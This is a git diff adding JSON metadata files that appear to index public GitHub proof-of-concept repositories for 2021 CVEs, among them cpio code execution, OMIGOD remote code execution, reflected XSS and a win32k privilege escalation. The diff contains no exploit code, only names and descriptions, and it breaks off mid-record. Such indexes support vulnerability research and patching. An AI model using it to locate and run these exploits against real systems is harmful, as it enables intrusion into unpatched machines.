diff --git a/2021/CVE-2021-38185.json b/2021/CVE-2021-38185.json
new file mode 100644
index 0000000000..ef1160b085
--- /dev/null
+++ b/2021/CVE-2021-38185.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 387582414,
+ "name": "cpiopwn",
+ "full_name": "fangqyi\/cpiopwn",
+ "owner": {
+ "login": "fangqyi",
+ "id": 59844836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59844836?v=4",
+ "html_url": "https:\/\/github.com\/fangqyi"
+ },
+ "html_url": "https:\/\/github.com\/fangqyi\/cpiopwn",
+ "description": "ACE poc exploit for glibc cpio 2.13 through mmap chunk metadata curruption (CVE-2021-38185)",
+ "fork": false,
+ "created_at": "2021-07-19T20:10:13Z",
+ "updated_at": "2021-11-23T21:24:06Z",
+ "pushed_at": "2021-08-11T08:59:33Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cpio",
+ "cve",
+ "exploit",
+ "linux",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38295.json b/2021/CVE-2021-38295.json
new file mode 100644
index 0000000000..4cea7a5268
--- /dev/null
+++ b/2021/CVE-2021-38295.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 417190090,
+ "name": "CVE-2021-38295-PoC",
+ "full_name": "ProfessionallyEvil\/CVE-2021-38295-PoC",
+ "owner": {
+ "login": "ProfessionallyEvil",
+ "id": 21111852,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21111852?v=4",
+ "html_url": "https:\/\/github.com\/ProfessionallyEvil"
+ },
+ "html_url": "https:\/\/github.com\/ProfessionallyEvil\/CVE-2021-38295-PoC",
+ "description": "A simple Python proof of concept for CVE-2021-38295.",
+ "fork": false,
+ "created_at": "2021-10-14T15:45:21Z",
+ "updated_at": "2022-02-20T09:16:52Z",
+ "pushed_at": "2021-10-14T15:49:41Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38297.json b/2021/CVE-2021-38297.json
new file mode 100644
index 0000000000..8548351eb3
--- /dev/null
+++ b/2021/CVE-2021-38297.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 719281537,
+ "name": "CVE-2021-38297",
+ "full_name": "gkrishnan724\/CVE-2021-38297",
+ "owner": {
+ "login": "gkrishnan724",
+ "id": 21004514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21004514?v=4",
+ "html_url": "https:\/\/github.com\/gkrishnan724"
+ },
+ "html_url": "https:\/\/github.com\/gkrishnan724\/CVE-2021-38297",
+ "description": "A Proof of concept scenario for exploitation of CVE2021-38297 GO WASM buffer-overflow",
+ "fork": false,
+ "created_at": "2023-11-15T20:52:36Z",
+ "updated_at": "2024-06-20T15:49:00Z",
+ "pushed_at": "2023-12-05T21:38:17Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 781757126,
+ "name": "CVE-2021-38297-Go-wasm-Replication",
+ "full_name": "paras98\/CVE-2021-38297-Go-wasm-Replication",
+ "owner": {
+ "login": "paras98",
+ "id": 32601927,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32601927?v=4",
+ "html_url": "https:\/\/github.com\/paras98"
+ },
+ "html_url": "https:\/\/github.com\/paras98\/CVE-2021-38297-Go-wasm-Replication",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-04T01:17:05Z",
+ "updated_at": "2024-04-04T01:33:04Z",
+ "pushed_at": "2024-04-04T01:49:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38314.json b/2021/CVE-2021-38314.json
new file mode 100644
index 0000000000..7d1b437145
--- /dev/null
+++ b/2021/CVE-2021-38314.json
@@ -0,0 +1,220 @@
+[
+ {
+ "id": 434961092,
+ "name": "CVE-2021-38314",
+ "full_name": "orangmuda\/CVE-2021-38314",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-38314",
+ "description": " Unauthenticated Sensitive Information Disclosure (CVE-2021–38314).",
+ "fork": false,
+ "created_at": "2021-12-04T17:08:05Z",
+ "updated_at": "2022-08-17T17:49:09Z",
+ "pushed_at": "2021-12-04T17:09:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-38314",
+ "exploit",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435936211,
+ "name": "cve-2021-38314",
+ "full_name": "phrantom\/cve-2021-38314",
+ "owner": {
+ "login": "phrantom",
+ "id": 52974841,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52974841?v=4",
+ "html_url": "https:\/\/github.com\/phrantom"
+ },
+ "html_url": "https:\/\/github.com\/phrantom\/cve-2021-38314",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-07T15:39:04Z",
+ "updated_at": "2022-12-15T21:57:12Z",
+ "pushed_at": "2021-12-07T16:21:19Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439038372,
+ "name": "CVE-2021-38314",
+ "full_name": "shubhayu-64\/CVE-2021-38314",
+ "owner": {
+ "login": "shubhayu-64",
+ "id": 68614625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68614625?v=4",
+ "html_url": "https:\/\/github.com\/shubhayu-64"
+ },
+ "html_url": "https:\/\/github.com\/shubhayu-64\/CVE-2021-38314",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-16T15:27:59Z",
+ "updated_at": "2022-10-14T16:45:57Z",
+ "pushed_at": "2021-12-16T15:31:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 492366456,
+ "name": "cve-2021-38314",
+ "full_name": "twseptian\/cve-2021-38314",
+ "owner": {
+ "login": "twseptian",
+ "id": 9025301,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4",
+ "html_url": "https:\/\/github.com\/twseptian"
+ },
+ "html_url": "https:\/\/github.com\/twseptian\/cve-2021-38314",
+ "description": "cve-2021-38314 - Unauthenticated Sensitive Information Disclosure",
+ "fork": false,
+ "created_at": "2022-05-15T02:10:01Z",
+ "updated_at": "2023-12-21T16:34:55Z",
+ "pushed_at": "2022-05-15T12:38:38Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-38314",
+ "wordpress",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 507639325,
+ "name": "CVE-2021-38314",
+ "full_name": "c0ff33b34n\/CVE-2021-38314",
+ "owner": {
+ "login": "c0ff33b34n",
+ "id": 86168298,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86168298?v=4",
+ "html_url": "https:\/\/github.com\/c0ff33b34n"
+ },
+ "html_url": "https:\/\/github.com\/c0ff33b34n\/CVE-2021-38314",
+ "description": "Python exploit for CVE-2021-38314",
+ "fork": false,
+ "created_at": "2022-06-26T17:23:40Z",
+ "updated_at": "2022-07-15T05:19:18Z",
+ "pushed_at": "2022-08-12T17:25:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 534133828,
+ "name": "CVE-2021-38314",
+ "full_name": "akhilkoradiya\/CVE-2021-38314",
+ "owner": {
+ "login": "akhilkoradiya",
+ "id": 102510716,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102510716?v=4",
+ "html_url": "https:\/\/github.com\/akhilkoradiya"
+ },
+ "html_url": "https:\/\/github.com\/akhilkoradiya\/CVE-2021-38314",
+ "description": "CVE-2021-38314 Python Exploit",
+ "fork": false,
+ "created_at": "2022-09-08T09:08:48Z",
+ "updated_at": "2024-06-14T09:51:51Z",
+ "pushed_at": "2022-09-08T09:49:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 633954680,
+ "name": "CVE-2021-38314",
+ "full_name": "0xGabe\/CVE-2021-38314",
+ "owner": {
+ "login": "0xGabe",
+ "id": 68028935,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4",
+ "html_url": "https:\/\/github.com\/0xGabe"
+ },
+ "html_url": "https:\/\/github.com\/0xGabe\/CVE-2021-38314",
+ "description": "Exploit in python3 to explore CVE-2021-38314 in Redux Framework a wordpress plugin ",
+ "fork": false,
+ "created_at": "2023-04-28T17:03:27Z",
+ "updated_at": "2023-05-02T19:43:05Z",
+ "pushed_at": "2023-04-28T17:08:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38540.json b/2021/CVE-2021-38540.json
new file mode 100644
index 0000000000..b335a9ea3c
--- /dev/null
+++ b/2021/CVE-2021-38540.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 502931948,
+ "name": "PoC-for-CVE-2021-38540-",
+ "full_name": "Captain-v-hook\/PoC-for-CVE-2021-38540-",
+ "owner": {
+ "login": "Captain-v-hook",
+ "id": 99005260,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99005260?v=4",
+ "html_url": "https:\/\/github.com\/Captain-v-hook"
+ },
+ "html_url": "https:\/\/github.com\/Captain-v-hook\/PoC-for-CVE-2021-38540-",
+ "description": "Missing Authentication on Critical component CVE-2021-38540",
+ "fork": false,
+ "created_at": "2022-06-13T11:43:26Z",
+ "updated_at": "2023-07-18T09:23:20Z",
+ "pushed_at": "2022-06-13T11:53:58Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38560.json b/2021/CVE-2021-38560.json
new file mode 100644
index 0000000000..a07437b1be
--- /dev/null
+++ b/2021/CVE-2021-38560.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 453927241,
+ "name": "iVANTI-CVE-2021-38560",
+ "full_name": "os909\/iVANTI-CVE-2021-38560",
+ "owner": {
+ "login": "os909",
+ "id": 98735939,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98735939?v=4",
+ "html_url": "https:\/\/github.com\/os909"
+ },
+ "html_url": "https:\/\/github.com\/os909\/iVANTI-CVE-2021-38560",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-31T08:21:05Z",
+ "updated_at": "2023-04-28T13:33:24Z",
+ "pushed_at": "2022-02-01T09:47:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38583.json b/2021/CVE-2021-38583.json
new file mode 100644
index 0000000000..cf27ac6749
--- /dev/null
+++ b/2021/CVE-2021-38583.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395107205,
+ "name": "CVE-2021-38583",
+ "full_name": "charlesbickel\/CVE-2021-38583",
+ "owner": {
+ "login": "charlesbickel",
+ "id": 6393058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6393058?v=4",
+ "html_url": "https:\/\/github.com\/charlesbickel"
+ },
+ "html_url": "https:\/\/github.com\/charlesbickel\/CVE-2021-38583",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-11T20:19:39Z",
+ "updated_at": "2022-03-09T21:38:04Z",
+ "pushed_at": "2021-08-12T12:54:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38601.json b/2021/CVE-2021-38601.json
new file mode 100644
index 0000000000..087b51331c
--- /dev/null
+++ b/2021/CVE-2021-38601.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395420731,
+ "name": "CVE-2021-38601",
+ "full_name": "5l1v3r1\/CVE-2021-38601",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-38601",
+ "description": "CVE-2021-38601 - Reflected XSS in Pepperminty-Wiki 0.23-dev",
+ "fork": false,
+ "created_at": "2021-08-12T19:13:35Z",
+ "updated_at": "2022-01-08T15:57:35Z",
+ "pushed_at": "2021-08-12T18:58:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38602.json b/2021/CVE-2021-38602.json
new file mode 100644
index 0000000000..519ca3b361
--- /dev/null
+++ b/2021/CVE-2021-38602.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395187896,
+ "name": "CVE-2021-38602",
+ "full_name": "KielVaughn\/CVE-2021-38602",
+ "owner": {
+ "login": "KielVaughn",
+ "id": 88814157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88814157?v=4",
+ "html_url": "https:\/\/github.com\/KielVaughn"
+ },
+ "html_url": "https:\/\/github.com\/KielVaughn\/CVE-2021-38602",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-12T03:55:27Z",
+ "updated_at": "2021-08-13T14:05:35Z",
+ "pushed_at": "2021-08-12T20:58:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38603.json b/2021/CVE-2021-38603.json
new file mode 100644
index 0000000000..7311ce1734
--- /dev/null
+++ b/2021/CVE-2021-38603.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395444418,
+ "name": "CVE-2021-38603",
+ "full_name": "KielVaughn\/CVE-2021-38603",
+ "owner": {
+ "login": "KielVaughn",
+ "id": 88814157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88814157?v=4",
+ "html_url": "https:\/\/github.com\/KielVaughn"
+ },
+ "html_url": "https:\/\/github.com\/KielVaughn\/CVE-2021-38603",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-12T21:08:54Z",
+ "updated_at": "2021-08-13T14:05:37Z",
+ "pushed_at": "2021-08-12T21:09:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38619.json b/2021/CVE-2021-38619.json
new file mode 100644
index 0000000000..f6d282224e
--- /dev/null
+++ b/2021/CVE-2021-38619.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395501049,
+ "name": "CVE-2021-38619",
+ "full_name": "charlesbickel\/CVE-2021-38619",
+ "owner": {
+ "login": "charlesbickel",
+ "id": 6393058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6393058?v=4",
+ "html_url": "https:\/\/github.com\/charlesbickel"
+ },
+ "html_url": "https:\/\/github.com\/charlesbickel\/CVE-2021-38619",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-13T02:42:25Z",
+ "updated_at": "2022-03-09T21:38:05Z",
+ "pushed_at": "2021-08-13T13:40:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38639.json b/2021/CVE-2021-38639.json
new file mode 100644
index 0000000000..029ad0e94c
--- /dev/null
+++ b/2021/CVE-2021-38639.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 407374212,
+ "name": "CVE-2021-38639",
+ "full_name": "DarkSprings\/CVE-2021-38639",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-38639",
+ "description": "Windows win32k ascension UAC poc",
+ "fork": false,
+ "created_at": "2021-09-17T02:09:37Z",
+ "updated_at": "2021-09-17T02:38:42Z",
+ "pushed_at": "2021-09-17T02:38:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3864.json b/2021/CVE-2021-3864.json
new file mode 100644
index 0000000000..6ef9bbb3ea
--- /dev/null
+++ b/2021/CVE-2021-3864.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476460097,
+ "name": "cve-2021-3864",
+ "full_name": "walac\/cve-2021-3864",
+ "owner": {
+ "login": "walac",
+ "id": 611309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/611309?v=4",
+ "html_url": "https:\/\/github.com\/walac"
+ },
+ "html_url": "https:\/\/github.com\/walac\/cve-2021-3864",
+ "description": "Test for cve-2021-3864",
+ "fork": false,
+ "created_at": "2022-03-31T20:03:04Z",
+ "updated_at": "2022-08-15T15:42:17Z",
+ "pushed_at": "2022-04-01T20:40:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38647.json b/2021/CVE-2021-38647.json
new file mode 100644
index 0000000000..364fd72e14
--- /dev/null
+++ b/2021/CVE-2021-38647.json
@@ -0,0 +1,399 @@
+[
+ {
+ "id": 406617770,
+ "name": "CVE-2021-38647",
+ "full_name": "corelight\/CVE-2021-38647",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-38647",
+ "description": "CVE-2021-38647 AKA \"OMIGOD\" vulnerability in Windows OMI ",
+ "fork": false,
+ "created_at": "2021-09-15T04:51:02Z",
+ "updated_at": "2023-09-28T11:31:27Z",
+ "pushed_at": "2022-02-11T01:34:56Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 406932707,
+ "name": "CVE-2021-38647",
+ "full_name": "midoxnet\/CVE-2021-38647",
+ "owner": {
+ "login": "midoxnet",
+ "id": 27289397,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27289397?v=4",
+ "html_url": "https:\/\/github.com\/midoxnet"
+ },
+ "html_url": "https:\/\/github.com\/midoxnet\/CVE-2021-38647",
+ "description": "CVE-2021-38647 POC for RCE",
+ "fork": false,
+ "created_at": "2021-09-15T21:44:30Z",
+ "updated_at": "2023-05-22T14:10:47Z",
+ "pushed_at": "2021-09-15T21:48:10Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 406986611,
+ "name": "CVE-2021-38647",
+ "full_name": "horizon3ai\/CVE-2021-38647",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-38647",
+ "description": "Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)",
+ "fork": false,
+ "created_at": "2021-09-16T02:11:36Z",
+ "updated_at": "2024-06-07T12:53:26Z",
+ "pushed_at": "2021-09-16T10:39:04Z",
+ "stargazers_count": 236,
+ "watchers_count": 236,
+ "has_discussions": false,
+ "forks_count": 56,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 56,
+ "watchers": 236,
+ "score": 0,
+ "subscribers_count": 12
+ },
+ {
+ "id": 407086358,
+ "name": "cve-2021-38647",
+ "full_name": "Immersive-Labs-Sec\/cve-2021-38647",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/cve-2021-38647",
+ "description": "A PoC exploit for CVE-2021-38647 RCE in OMI",
+ "fork": false,
+ "created_at": "2021-09-16T08:33:02Z",
+ "updated_at": "2023-05-05T16:11:59Z",
+ "pushed_at": "2021-09-16T14:50:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 407219653,
+ "name": "omigood",
+ "full_name": "marcosimioni\/omigood",
+ "owner": {
+ "login": "marcosimioni",
+ "id": 22682005,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22682005?v=4",
+ "html_url": "https:\/\/github.com\/marcosimioni"
+ },
+ "html_url": "https:\/\/github.com\/marcosimioni\/omigood",
+ "description": "OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the \"OMIGOD\" vulnerabilities discovered by Wiz's threat research team, specifically CVE-2021-38647.",
+ "fork": false,
+ "created_at": "2021-09-16T15:34:03Z",
+ "updated_at": "2024-02-07T23:37:20Z",
+ "pushed_at": "2021-09-22T12:46:31Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-38647",
+ "omigod",
+ "omigood",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 407896703,
+ "name": "omigod-lab",
+ "full_name": "craig-m-unsw\/omigod-lab",
+ "owner": {
+ "login": "craig-m-unsw",
+ "id": 54346946,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54346946?v=4",
+ "html_url": "https:\/\/github.com\/craig-m-unsw"
+ },
+ "html_url": "https:\/\/github.com\/craig-m-unsw\/omigod-lab",
+ "description": "A Vagrant VM test lab to learn about CVE-2021-38647 in the Open Management Infrastructure agent (aka \"omigod\").",
+ "fork": false,
+ "created_at": "2021-09-18T15:25:18Z",
+ "updated_at": "2024-03-13T11:06:29Z",
+ "pushed_at": "2021-09-27T11:34:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 408167693,
+ "name": "CVE-2021-38647-POC-and-Demo-environment",
+ "full_name": "SimenBai\/CVE-2021-38647-POC-and-Demo-environment",
+ "owner": {
+ "login": "SimenBai",
+ "id": 34043829,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34043829?v=4",
+ "html_url": "https:\/\/github.com\/SimenBai"
+ },
+ "html_url": "https:\/\/github.com\/SimenBai\/CVE-2021-38647-POC-and-Demo-environment",
+ "description": "OMIGod \/ CVE-2021-38647 POC and Demo environment",
+ "fork": false,
+ "created_at": "2021-09-19T15:43:32Z",
+ "updated_at": "2022-08-10T05:21:40Z",
+ "pushed_at": "2021-09-22T10:47:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 408518731,
+ "name": "CVE-2021-38647",
+ "full_name": "AlteredSecurity\/CVE-2021-38647",
+ "owner": {
+ "login": "AlteredSecurity",
+ "id": 71595940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71595940?v=4",
+ "html_url": "https:\/\/github.com\/AlteredSecurity"
+ },
+ "html_url": "https:\/\/github.com\/AlteredSecurity\/CVE-2021-38647",
+ "description": "CVE-2021-38647 - POC to exploit unauthenticated RCE #OMIGOD",
+ "fork": false,
+ "created_at": "2021-09-20T16:29:48Z",
+ "updated_at": "2024-05-10T18:29:07Z",
+ "pushed_at": "2021-09-26T04:37:04Z",
